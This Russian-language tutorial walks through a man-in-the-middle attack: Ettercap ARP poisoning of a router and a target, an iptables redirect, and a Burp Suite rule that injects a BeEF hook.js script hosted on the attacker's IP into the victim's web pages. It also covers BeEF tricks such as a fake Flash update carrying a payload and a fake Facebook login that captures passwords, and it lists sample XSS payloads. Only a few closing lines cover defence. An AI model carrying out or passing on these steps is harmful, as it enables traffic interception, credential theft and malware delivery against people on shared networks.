(Ettercap, Burp Suite, BeEF). MITM. Часть 2. Использование Burp Suite в атаках MITM. Подцепление на BeEF.
Материал предоставлен в ознакомительных и образовательных целях.
Содержание
1. Введение. Требования.
2. Понятие XSS.
3. Подготовка среды.
4. Запускаем Ettercap.
5. Запускаем Burp Suite.
5. Запускаем BeEF.
6. Продолжаем конфигурировать Burp Suite.
7. Работа с BeEF.
8. Подведение итогов. Рекомендации по защите. Полезные ссылки.
Введение. Требования.
Рад приветствовать читателей. В этой статье мы разберем использование утилиты Burp Suite для атаки MITM. Вообще, данная утилита предназначена для тестирования веб-приложений (к которым мы вернемся позже), но ее можно использовать также много еще для чего. Как уже ранее было сказано, будет использовать в атаке MITM.
Если вы не читали первую статью про MITM, обязательно прочитайте ее перед этой. Там рассмотрены понятия атаки MITM и использование утилит Bettercap и net-creds.
Требования:
- Иметь доступ к сети, в которой находится цель
Примечание: если у вас уже есть доступ к сети, вам не нужен Wi-Fi адаптер с поддержкой режима мониторинга. Главное быть просто подключенным к сети.
Понятие XSS.
XSS (Cross Site Scripting, получил аббревиатуру XSS, а не CSS, для избежания путаницы с CSS в HTML) - атака, которая заключается в том, чтобы запустить вредносный JavaScript на стороне пользователя.
Уязвимости XSS делятся на три типа:
-
Stored XSS
Пример: на доске объявлений в поле имя ввел <script>alert('Stored XSS')</script> и теперь каждый раз, когда кто-то заходит на страницу его профиля, он видит на экране сообщение 'Stored XSS' -
Reflected XSS
Пример: http://myunsafewebsite.com/store/product.php?id=<script>alert('ReflectedXSS')</script> -
DOM-Based XSS
Пример: http://myunsafewebsite.com/arictle/25/text.html#<script>alert('DOM-BasedXSS')</script>
Приведенная выше информация на данный момент нам не особо будет нужна, т.к. безопасность веб-приложений у нас еще не скоро. Для общего развития, можно сказать.
Подготовка среды.
Чтобы было удобнее:
sudo su
Установите BeEF:
apt update && apt install beef-xss
Запускаем Ettercap.
Включите форвард пакетов:
echo "1" > /proc/sys/net/ipv4/ip_forward
Запустите Ettercap:
ettercap -G
- Когда откроется окно Ettercap, выберите интерфейс, который хотите использовать и нажмите ОК.
- Нажмите на кнопку Show hosts (у нее иконка сервера)
- Нажмите на лупу для того, чтобы начать поиск хостов (если нужного не появилось, попробуйте еще раз)
- Выберите IP адрес роутера как цель 1
- Выберите IP адрес атакуемого как цель 2
- Нажмите на меню MITM
- Выберите ARP Poisoning, убедитесь, что стоит галочка Sniff remote connections и нажмите ОК
(в другом терминале)
sudo su
Чтобы перенаправлять данные с порта 80 на 8080:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Запускаем Burp Suite.
Запустите Burp Suite.
- Во вкладке Proxy перейдите в подраздел Options
- В разделе Proxy Listeners нажмите кнопку Add
- В поле Bind to port укажите порт 8080
- В списке выберите Specific address и в выпадающем меню выберите IP-адрес, который начинается на 192.168.0/1.
- Во вкладке Request Handling поставьте галочку “Support invisible proxying”
- Нажмите ОК
- Во вкладке Proxy перейдите в подраздел Intercept
- Нажмите на Intercept is ON для того, чтобы выключить перехват и перевести кнопку в положение Intercept is OFF
Запускаем BeEF.
Запускаем BeEF:
sudo beef-xss
При первом запуске потребует задать логин и пароль. Пароль должен отличаться от beef. Этот логин/пароль потребуется для входа в веб-интерфейс BeEF.
Продолжаем конфигурировать Burp Suite.
- Во вкладке Proxy перейдите в подраздел Options
- Крутите вниз, пока не найдете Match and Replace
- В этом разделе нажмите кнопку Add
- Ставим тип Response body
-
В поле Match: вписывайте
<\/head>
-
В поле Replace вписывайте:
<script src=”192.168.0/1.x:3000/hook.js”></script></head>
где 192.168.0/1.x - ваш IP-адрес - Поставьте галочку “Regex Match”
Ждите, пока атакуемый откроет страницу http://. Если вам нужно внедрять этот скрипт и на страницы https://, то единственный вариант - использовать Ettercap с модулем SSLStrip (который работает криво). Вариант использовать Bettercap вместо Ettercap - не вариант, т.к. Bettercap занимает порт 8080, хотя вы можете попробовать указать в Burp Suite другой порт и в iptables - также другой, не тестировал.
Работа с BeEF.
BeEF позволяет практически управлять браузером, когда открыта вкладка со скриптом. Можно показать фейковое уведомление об обновлении Flash Player, куда указать исполняемый файл с полезной нагрузкой, показать окно авторизации в Facebook (истекла сессия, введите логин/пароль), после чего он попадет вам в консоль и т.д.
Подробнее читайте по ссылке Hackware: Базовое использование BeEF в полезных ссылках.
Подведение итогов. Рекомендации по защите. Полезные ссылки.
Полезные ссылки.
- Hackware: руководство по осуществлению XSS атаки
- Википедия: межсайтовый скриптинг
- Hackware: Базовое использование BeEF
Рекомендации по защите.
- Не использовать открытые сети Wi-Fi
- Поддерживать безопасность личной сети Wi-Fi, иначе будет равноценна открытой сети
- Использовать расширение NoScript (Chrome Web Store | Firefox Browser Add-ons)
Итак, мы познакомились с подцеплением на BeEF при помощи Burp Suite.
Назад к списку статей…